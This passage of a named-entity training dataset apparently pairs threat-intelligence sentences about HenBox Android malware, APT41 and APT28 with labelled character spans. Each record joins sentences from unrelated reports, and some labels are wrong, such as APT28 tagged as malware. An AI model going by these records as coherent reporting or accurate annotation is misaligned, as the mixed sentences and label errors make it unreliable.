The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight .", "spans": [{"start": 231, "end": 242, "label": "Organization"}, {"start": 301, "end": 309, "label": "Organization"}, {"start": 420, "end": 431, "label": "Malware"}, {"start": 445, "end": 450, "label": "Organization"}]} {"text": "Sample 2 , has the package name cn.android.setting masquerading as Android \u2019 s Settings app , which has a similar package name ( com.android.settings ) . For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology .", "spans": [{"start": 32, "end": 50, "label": "Indicator"}, {"start": 79, "end": 91, "label": "System"}, {"start": 129, "end": 149, "label": "Indicator"}, {"start": 168, "end": 173, "label": "Organization"}, {"start": 178, "end": 184, "label": "Organization"}, {"start": 328, "end": 335, "label": "Organization"}, {"start": 491, "end": 501, "label": "Organization"}, {"start": 504, "end": 514, "label": "Organization"}, {"start": 517, "end": 530, "label": "Organization"}, {"start": 533, "end": 552, "label": "Organization"}, {"start": 555, "end": 565, "label": "Organization"}, {"start": 568, "end": 582, "label": "Organization"}, {"start": 589, "end": 607, "label": "Organization"}]} {"text": "This variant of HenBox also used the common green Android figure as the app logo and was named \u8bbe\u7f6e ( \u201c Backup \u201d in English ) . Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities . 
The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system .", "spans": [{"start": 16, "end": 22, "label": "Malware"}, {"start": 50, "end": 57, "label": "System"}, {"start": 138, "end": 146, "label": "Organization"}, {"start": 149, "end": 155, "label": "Organization"}, {"start": 160, "end": 165, "label": "Organization"}, {"start": 302, "end": 307, "label": "Organization"}, {"start": 327, "end": 340, "label": "Malware"}, {"start": 363, "end": 370, "label": "System"}]} {"text": "This variant \u2019 s app name , along with many others , is written in Chinese and describes the app as a backup tool . APT41 espionage operations against the healthcare , high-tech , and telecommunications sectors include establishing and maintaining strategic access , and through mid-2015 , the theft of intellectual property . The malware used by the Wekby group has ties to the HTTPBrowser malware family , and uses DNS requests as a command and control mechanism .", "spans": [{"start": 116, "end": 121, "label": "Organization"}, {"start": 155, "end": 165, "label": "Organization"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 184, "end": 210, "label": "Organization"}, {"start": 351, "end": 362, "label": "Organization"}, {"start": 379, "end": 405, "label": "Malware"}, {"start": 417, "end": 420, "label": "Indicator"}]} {"text": "Please see the IOCs section for all app and package name combinations . FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware . 
These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) .", "spans": [{"start": 72, "end": 79, "label": "Organization"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 225, "end": 244, "label": "Organization"}, {"start": 480, "end": 491, "label": "Malware"}, {"start": 505, "end": 518, "label": "Malware"}, {"start": 526, "end": 537, "label": "Organization"}, {"start": 566, "end": 569, "label": "System"}]} {"text": "Interestingly , the embedded app in sample 2 is not a version of the Android Settings app but instead the \u201c Amaq Agency \u201d app , which reports on ISIS related news . APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": [{"start": 69, "end": 85, "label": "System"}, {"start": 108, "end": 119, "label": "System"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 343, "end": 348, "label": "Organization"}, {"start": 374, "end": 394, "label": "Organization"}, {"start": 426, "end": 435, "label": "Organization"}, {"start": 438, "end": 447, "label": "Organization"}, {"start": 450, "end": 464, "label": "Organization"}, {"start": 469, "end": 483, "label": "Organization"}]} {"text": "Reports indicate fake versions of the Amaq app exist , likely in order to spy on those that use it . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions . 
APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": [{"start": 38, "end": 42, "label": "System"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 324, "end": 329, "label": "Organization"}, {"start": 355, "end": 375, "label": "Organization"}, {"start": 413, "end": 422, "label": "Organization"}, {"start": 451, "end": 460, "label": "Organization"}, {"start": 479, "end": 489, "label": "Organization"}, {"start": 501, "end": 515, "label": "Organization"}, {"start": 520, "end": 534, "label": "Organization"}]} {"text": "A month after observing sample 2 , we obtained another which used the same package name as sample 2 ( cn.android.setting ) . Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests . 
FANCY BEAR ( also known as Sofacy or APT28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": [{"start": 102, "end": 120, "label": "Indicator"}, {"start": 186, "end": 193, "label": "Organization"}, {"start": 215, "end": 234, "label": "Organization"}, {"start": 360, "end": 370, "label": "Organization"}, {"start": 387, "end": 393, "label": "Organization"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 558, "end": 567, "label": "Organization"}, {"start": 570, "end": 577, "label": "Organization"}, {"start": 580, "end": 586, "label": "Organization"}, {"start": 589, "end": 599, "label": "Organization"}, {"start": 604, "end": 617, "label": "Organization"}]} {"text": "However , this time the app name for both HenBox and the embedded app were identical : Islamawazi . APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed . APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment .", "spans": [{"start": 42, "end": 48, "label": "Malware"}, {"start": 87, "end": 97, "label": "System"}, {"start": 100, "end": 105, "label": "Organization"}, {"start": 171, "end": 178, "label": "Organization"}, {"start": 289, "end": 294, "label": "Malware"}, {"start": 295, "end": 302, "label": "Malware"}, {"start": 364, "end": 373, "label": "Malware"}]} {"text": "Islamawazi is also known as the Turkistan Islamic Party or \u201c TIP \u201d . Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity . 
However , three themes in APT28 's targeting clearly reflects LOCs of specific interest to an Eastern European government , most likely the Russian government .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 32, "end": 55, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 300, "end": 305, "label": "Organization"}, {"start": 385, "end": 395, "label": "Organization"}, {"start": 414, "end": 432, "label": "Organization"}]} {"text": "This organization was formerly known as the East Turkestan Islamic Party and is purported to be an Islamic extremist separatist organization founded by Uyghur jihadists . Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government .", "spans": [{"start": 44, "end": 72, "label": "Organization"}, {"start": 233, "end": 238, "label": "Organization"}, {"start": 431, "end": 436, "label": "Organization"}, {"start": 519, "end": 537, "label": "Organization"}]} {"text": "The embedded app appears to be a media player . APT41 has targeted organizations in 14 countries (and Hong Kong) over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) . Georgian military security issues , particularly with regard to U.S. 
cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics .", "spans": [{"start": 48, "end": 53, "label": "Organization"}, {"start": 489, "end": 495, "label": "Organization"}]} {"text": "These examples , together with the HenBox app placed on a very specific third-party app store , point clearly to at least some of the intended targets of these malicious apps being Uyghurs , specifically those with interest in or association with terrorist groups . APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities . Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials .", "spans": [{"start": 35, "end": 41, "label": "Malware"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 301, "end": 309, "label": "Organization"}, {"start": 450, "end": 466, "label": "Organization"}]} {"text": "These threat actors appear to be choosing the right apps \u2013 those that could be popular with locals in the region , at the right time \u2013 while tensions grow in this region of China , to ensure a good victim install-base . We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . 
APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor .", "spans": [{"start": 277, "end": 282, "label": "Organization"}, {"start": 411, "end": 416, "label": "Organization"}, {"start": 598, "end": 616, "label": "Organization"}, {"start": 620, "end": 625, "label": "Organization"}]} {"text": "HenBox Roosts HenBox has evolved over the past three years , and of the almost two hundred HenBox apps in AutoFocus , the vast majority contain several native libraries as well as other components in order to achieve their objective . In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously . We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 14, "end": 20, "label": "Malware"}, {"start": 91, "end": 97, "label": "Malware"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 442, "end": 447, "label": "Organization"}]} {"text": "Most components are obfuscated in some way , whether it be simple XOR with a single-byte key , or through the use of ZIP or Zlib compression wrapped with RC4 encryption . Since 2017 , APT41's activities have included a series of supply chain compromises . 
We assess that APT28 is most likely sponsored by the Russian government .", "spans": [{"start": 117, "end": 120, "label": "System"}, {"start": 124, "end": 128, "label": "System"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 271, "end": 276, "label": "Organization"}, {"start": 309, "end": 327, "label": "Organization"}]} {"text": "These components are responsible for a myriad of functions including handling decryption , network communications , gaining super-user privileges , monitoring system logs , loading additional Dalvik code files , tracking the device location and more . The group also targeted companies involved in producing motherboards , processors , and server solutions for enterprises . Given the available data , we assess that APT28 's work is sponsored by the Russian government .", "spans": [{"start": 256, "end": 261, "label": "Organization"}, {"start": 298, "end": 320, "label": "Organization"}, {"start": 323, "end": 333, "label": "Organization"}, {"start": 340, "end": 356, "label": "Organization"}, {"start": 417, "end": 422, "label": "Organization"}, {"start": 451, "end": 469, "label": "Organization"}]} {"text": "The remainder of this section describes at a high-level what HenBox is capable of , and how it operates . Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market . The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. 
and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election .", "spans": [{"start": 119, "end": 124, "label": "Organization"}, {"start": 138, "end": 151, "label": "Organization"}, {"start": 234, "end": 250, "label": "Organization"}, {"start": 253, "end": 272, "label": "Organization"}, {"start": 275, "end": 290, "label": "Organization"}, {"start": 301, "end": 316, "label": "Organization"}, {"start": 445, "end": 453, "label": "Organization"}, {"start": 458, "end": 478, "label": "Organization"}, {"start": 531, "end": 538, "label": "Organization"}, {"start": 543, "end": 553, "label": "Organization"}, {"start": 573, "end": 580, "label": "Organization"}, {"start": 585, "end": 596, "label": "Organization"}]} {"text": "The description is based on analysis of the sample described in Table 3 below , which was of interest given its C2 domain mefound [ . In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China . The targets of TG-4127 include military , government and defense sectors .", "spans": [{"start": 115, "end": 133, "label": "Indicator"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 174, "end": 195, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}, {"start": 293, "end": 301, "label": "Organization"}, {"start": 304, "end": 314, "label": "Organization"}, {"start": 319, "end": 334, "label": "Organization"}]} {"text": "] com overlaps with PlugX , Zupdax , and Poison Ivy malware families discussed in more detail later . In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year . 
Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK .", "spans": [{"start": 20, "end": 25, "label": "Malware"}, {"start": 28, "end": 34, "label": "Malware"}, {"start": 41, "end": 51, "label": "Malware"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 270, "end": 289, "label": "Malware"}, {"start": 318, "end": 326, "label": "Malware"}, {"start": 335, "end": 361, "label": "Malware"}, {"start": 375, "end": 384, "label": "Malware"}]} {"text": "SHA256 Package Name App Name a6c7351b09a733a1b3ff8a0901c5bde fdc3b566bfcedcdf5a338c3a97c9f249b com.android.henbox \u5907\u4efd ( Backup ) Table 3 HenBox variant used in description Once this variant of HenBox is installed on the victim \u2019 s device , the app can be executed in two different ways : One method for executing HenBox is for the victim to launch the malicious app ( named \u201c Backup \u201d , in Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region . 
While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government .", "spans": [{"start": 29, "end": 60, "label": "Indicator"}, {"start": 95, "end": 113, "label": "Indicator"}, {"start": 136, "end": 142, "label": "Malware"}, {"start": 192, "end": 198, "label": "Malware"}, {"start": 312, "end": 318, "label": "Malware"}, {"start": 402, "end": 407, "label": "Organization"}, {"start": 434, "end": 462, "label": "Organization"}, {"start": 560, "end": 567, "label": "Organization"}, {"start": 798, "end": 816, "label": "Organization"}]} {"text": "this instance ) from the launcher view on their device , as shown in Figure 3 below . Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity . CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": [{"start": 95, "end": 112, "label": "Organization"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 262, "end": 265, "label": "Organization"}, {"start": 413, "end": 431, "label": "Organization"}]} {"text": "This runs code in the onCreate ( ) method of the app \u2019 s MainActivity class , which in effect is the program \u2019 s entry point . In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content . 
This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian government .", "spans": [{"start": 153, "end": 158, "label": "Organization"}, {"start": 189, "end": 204, "label": "Organization"}, {"start": 412, "end": 417, "label": "Organization"}, {"start": 425, "end": 443, "label": "Organization"}]} {"text": "This process is defined in the app \u2019 s AndroidManifest.xml config file , as shown in the following snippet . This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong . Our visibility into the operations of APT28 - a group we believe the Russian government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them .", "spans": [{"start": 157, "end": 162, "label": "Organization"}, {"start": 173, "end": 186, "label": "Organization"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 278, "end": 296, "label": "Organization"}, {"start": 346, "end": 356, "label": "Organization"}]} {"text": "Doing so executes code checking if the device is manufactured by Xiaomi , or if Xiaomi \u2019 s fork of Android is running on the device . APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not always correlate with targeted users or organizations . 
Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests .", "spans": [{"start": 65, "end": 71, "label": "Organization"}, {"start": 80, "end": 90, "label": "Organization"}, {"start": 99, "end": 106, "label": "System"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 357, "end": 362, "label": "Organization"}]} {"text": "Under these conditions , the app continues executing and the intent of targeting Xiaomi devices and users could be inferred , however poorly written code results in execution in more environments than perhaps intended ; further checks are made to ascertain whether the app is running on an emulator , perhaps to evade researcher analysis environments . In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled \u4e2d\u6771\u547c\u5438\u5668\u75c7\u5019 \u7fa4(MERS)\u306e\u4e88\u9632 , \u201d which translates to Prevention of Middle East Respiratory Syndrome (MERS) . APT28 espionage activity has primarily targeted entities in the U.S. 
, Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 81, "end": 87, "label": "Organization"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 380, "end": 407, "label": "Organization"}, {"start": 683, "end": 694, "label": "Organization"}, {"start": 697, "end": 707, "label": "Organization"}, {"start": 710, "end": 726, "label": "Organization"}, {"start": 729, "end": 743, "label": "Organization"}, {"start": 750, "end": 760, "label": "Organization"}, {"start": 765, "end": 772, "label": "Organization"}, {"start": 796, "end": 814, "label": "Organization"}]} {"text": "Assuming these checks pass , one of the main ELF libraries is loaded that orchestrates other components and provides functionality to the app \u2019 s Dalvik code through the Java Native Interface ( JNI ) . APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 . APT28 espionage activity has primarily targeted entities in the U.S. 
, Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 202, "end": 207, "label": "Organization"}, {"start": 226, "end": 250, "label": "Organization"}, {"start": 588, "end": 599, "label": "Organization"}, {"start": 604, "end": 614, "label": "Organization"}, {"start": 617, "end": 633, "label": "Organization"}, {"start": 636, "end": 650, "label": "Organization"}, {"start": 657, "end": 667, "label": "Organization"}, {"start": 672, "end": 679, "label": "Organization"}, {"start": 703, "end": 721, "label": "Organization"}]} {"text": "HenBox checks whether this execution is its first by using Android \u2019 s shared preferences feature to persist XML key-value pair data . Unlike other observed Chinese espionage operators , APT41 conducts explicit financially motivated activity , which has included the use of tools that are otherwise exclusively used in campaigns supporting state interests . Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 59, "end": 66, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 211, "end": 222, "label": "Organization"}, {"start": 430, "end": 435, "label": "Organization"}]} {"text": "If it is the first execution , and if the app \u2019 s path does not contain \u201c /system/app \u201d ( i.e . Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices . 
After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests .", "spans": [{"start": 74, "end": 85, "label": "Indicator"}, {"start": 105, "end": 110, "label": "Organization"}, {"start": 134, "end": 148, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}]} {"text": "HenBox is not running as a system app ) , another ELF library is loaded to aid with executing super-user commands . In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear . After compromising a political organization , APT28 will steal internal data .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 138, "end": 143, "label": "Organization"}, {"start": 153, "end": 169, "label": "Organization"}, {"start": 260, "end": 282, "label": "Organization"}, {"start": 285, "end": 290, "label": "Organization"}]} {"text": "The second method uses intents , broadcasts , and receivers to execute HenBox code . In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . 
On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye 's long held public assessment that the Russian government sponsors APT28 .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 361, "end": 392, "label": "Organization"}, {"start": 395, "end": 398, "label": "Organization"}, {"start": 439, "end": 442, "label": "Organization"}, {"start": 489, "end": 496, "label": "Organization"}, {"start": 537, "end": 555, "label": "Organization"}, {"start": 565, "end": 570, "label": "Organization"}]} {"text": "Providing the app has registered an intent to process particular events from the system , and one of said events occurs , HenBox is effectively brought to life through external stimulus from another app on the system broadcasting a request , or the system itself broadcasting a particular event has occurred . This provides another connection between the targeting of the cryptocurrency organizations and video game targeting . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian government 's strategic intelligence requirements .", "spans": [{"start": 372, "end": 400, "label": "Organization"}, {"start": 405, "end": 425, "label": "Organization"}, {"start": 446, "end": 453, "label": "Organization"}, {"start": 463, "end": 468, "label": "Organization"}, {"start": 542, "end": 547, "label": "Organization"}, {"start": 581, "end": 599, "label": "Organization"}]} {"text": "These intents are typically defined statically in the app \u2019 s AndroidManifest.xml config file ; some HenBox variants register further intents from their code at run-time . In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency . 
In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian government 's strategic intelligence requirements .", "spans": [{"start": 101, "end": 107, "label": "Malware"}, {"start": 194, "end": 199, "label": "Organization"}, {"start": 224, "end": 229, "label": "System"}, {"start": 343, "end": 350, "label": "Organization"}, {"start": 360, "end": 365, "label": "Organization"}, {"start": 440, "end": 445, "label": "Organization"}, {"start": 479, "end": 497, "label": "Organization"}]} {"text": "Once a matching intent is triggered , the respective Receiver code will be executed , leading to other HenBox behaviors being launched , which are described later . APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": [{"start": 165, "end": 170, "label": "Organization"}, {"start": 196, "end": 213, "label": "Organization"}, {"start": 299, "end": 315, "label": "Organization"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 391, "end": 398, "label": "Organization"}, {"start": 403, "end": 424, "label": "Organization"}, {"start": 444, "end": 450, "label": "System"}]} {"text": "Table 4 below lists the intents that are statically registered in this HenBox variant \u2019 s AndroidManifest.xml config file , together with a description of what that intent does , and when it would be used . APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry . 
Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": [{"start": 71, "end": 77, "label": "Malware"}, {"start": 207, "end": 212, "label": "Organization"}, {"start": 251, "end": 268, "label": "Organization"}, {"start": 391, "end": 396, "label": "Organization"}, {"start": 414, "end": 418, "label": "Organization"}]} {"text": "Depending on the intent triggered , one of two Receivers would be called , in this instance they are called Boot or Time but the name is somewhat immaterial . We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics . Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian government .", "spans": [{"start": 277, "end": 293, "label": "System"}, {"start": 311, "end": 331, "label": "System"}, {"start": 502, "end": 507, "label": "Organization"}, {"start": 528, "end": 546, "label": "Organization"}]} {"text": "Receiver Intent Name Description BootReceiver android.intent.action.BOOT_COMPLETED System notification that the device has finished booting . In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO . In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor .", "spans": [{"start": 46, "end": 82, "label": "Indicator"}, {"start": 160, "end": 165, "label": "Organization"}, {"start": 338, "end": 343, "label": "Organization"}]} {"text": "android.intent.action.restart A legacy intent used to indicate a system restart . 
Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators . For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations .", "spans": [{"start": 0, "end": 29, "label": "Indicator"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 210, "end": 237, "label": "Organization"}, {"start": 284, "end": 298, "label": "Organization"}, {"start": 355, "end": 360, "label": "Organization"}]} {"text": "android.intent.action.SIM_STATE_CHANGED System notification that the SIM card has changed or been removed . APT41 has been observed inserting malicious code into legitimate video game files to distribute malware . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": [{"start": 0, "end": 39, "label": "Indicator"}, {"start": 108, "end": 113, "label": "Organization"}, {"start": 264, "end": 295, "label": "Organization"}, {"start": 298, "end": 301, "label": "Organization"}, {"start": 346, "end": 349, "label": "Organization"}, {"start": 369, "end": 387, "label": "Organization"}, {"start": 493, "end": 501, "label": "Organization"}, {"start": 506, "end": 516, "label": "Organization"}]} {"text": "android.intent.action.PACKAGE_INSTALL System notification that the download and eventual installation of an app package is happening ( this is deprecated ) android.intent.action.PACKAGE_ADDED System notification that a new app package has been installed on the device , including the name of said package . 
In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": [{"start": 0, "end": 37, "label": "Indicator"}, {"start": 156, "end": 191, "label": "Indicator"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 542, "end": 547, "label": "Organization"}, {"start": 573, "end": 591, "label": "Organization"}, {"start": 697, "end": 705, "label": "Organization"}, {"start": 710, "end": 720, "label": "Organization"}]} {"text": "com.xiaomi.smarthome.receive_alarm Received notifications from Xiaomi \u2019 s smart home IoT devices . We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems . Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia .", "spans": [{"start": 0, "end": 34, "label": "Indicator"}, {"start": 63, "end": 69, "label": "Organization"}, {"start": 121, "end": 126, "label": "Organization"}, {"start": 218, "end": 226, "label": "System"}, {"start": 338, "end": 345, "label": "Organization"}, {"start": 352, "end": 359, "label": "Organization"}]} {"text": "TimeReceiver android.intent.action.ACTION_TIME_CHANGED System notification that the time was set . Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets . 
Several sources consider APT28 a group of CyberMercs based in Russia .", "spans": [{"start": 13, "end": 54, "label": "Indicator"}, {"start": 123, "end": 131, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 247, "end": 252, "label": "Organization"}]} {"text": "android.intent.action.CONNECTIVITY_CHANGE System notification that a change in network connectivity has occurred , either lost or established . APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies . The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada .", "spans": [{"start": 0, "end": 41, "label": "Indicator"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 220, "end": 239, "label": "Organization"}, {"start": 309, "end": 314, "label": "Organization"}]} {"text": "Since Android version 7 ( Nougat ) this information is gathered using other means , perhaps inferring the devices used by potential victim run older versions of Android . In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware . 
We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": [{"start": 6, "end": 13, "label": "System"}, {"start": 26, "end": 32, "label": "System"}, {"start": 161, "end": 168, "label": "System"}, {"start": 198, "end": 203, "label": "Organization"}, {"start": 320, "end": 329, "label": "Organization"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 382, "end": 390, "label": "Organization"}]} {"text": "Table 4 HenBox variant 's Intents and Receivers Most of the intents registered in the AndroidManifest.xml file , or loaded during run-time , are commonly found in malicious Android apps . APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware . Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin .", "spans": [{"start": 8, "end": 14, "label": "Malware"}, {"start": 173, "end": 180, "label": "System"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 341, "end": 348, "label": "Organization"}]} {"text": "What \u2019 s more interesting , and much less common , is the inclusion of the com.xiaomi.smarthome.receive_alarm intent filter . We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . 
Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations .", "spans": [{"start": 75, "end": 109, "label": "Indicator"}, {"start": 142, "end": 147, "label": "Organization"}, {"start": 413, "end": 421, "label": "Organization"}, {"start": 481, "end": 486, "label": "Organization"}, {"start": 525, "end": 537, "label": "Organization"}]} {"text": "Xiaomi , a privately owned Chinese electronics and software company , is the 5th largest smart phone manufacturer in the world and also manufactures IoT devices for the home . APT41 has also used credentials compromised in previous operations . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 176, "end": 181, "label": "Organization"}, {"start": 259, "end": 271, "label": "Organization"}, {"start": 342, "end": 351, "label": "Malware"}, {"start": 354, "end": 358, "label": "Malware"}, {"start": 361, "end": 369, "label": "Malware"}, {"start": 372, "end": 376, "label": "Malware"}]} {"text": "Most devices can be controlled by Xiaomi \u2019 s \u201c MiHome \u201d Android app , which is available on Google Play with between 1,000,000 and 5,000,000 downloads . In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service 